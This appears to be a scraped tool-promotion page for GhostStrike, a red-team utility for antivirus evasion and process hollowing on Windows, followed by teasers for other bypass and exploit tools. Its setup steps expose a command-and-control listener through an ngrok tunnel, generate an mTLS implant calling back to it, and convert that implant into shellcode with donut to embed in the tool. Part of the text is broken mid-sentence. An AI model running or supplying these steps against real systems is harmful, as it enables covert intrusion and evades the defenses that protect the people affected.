GhostStrike is an advanced cybersecurity tool designed for Red Team operations, featuring sophisticated techniques to evade detection and perform process hollowing on Windows systems.
You can configure GhostStrike with the following steps:
ngrok tcp 443
generate --mtls x.tcp.ngrok.io --save YourFile.exe
mtls --lhost 0.0.0.0 --lport 443
./donut -i /home/YourUser/YourFile.exe -a 2 -f 1 -o /home/YourUser/YourFile.bin
xxd -i YourFile.bin > YourFile.h
g++
, clang++
, or Visual Studio, is sufficient to compile the code.No additional dependencies are needed to build GhostStrike. Simply compile the source code with your preferred C++ compiler, and you’re ready to go!
BypassAV refers to the collection of techniques and tools used to bypass antivirus (AV) and…
ComDotNetExploit is a Proof of Concept (PoC) tool designed to demonstrate the exploitation of Windows…
Trigon is a sophisticated deterministic kernel exploit targeting Apple’s iOS devices, leveraging the CVE-2023-32434 vulnerability.…
Bug bounty report templates are essential tools for streamlining the process of documenting vulnerabilities. They…
FullBypass is a tool designed to circumvent Microsoft's Antimalware Scan Interface (AMSI) and PowerShell's Constrained…
Carseat is a Python-based tool that replicates the functionality of the well-known security auditing tool,…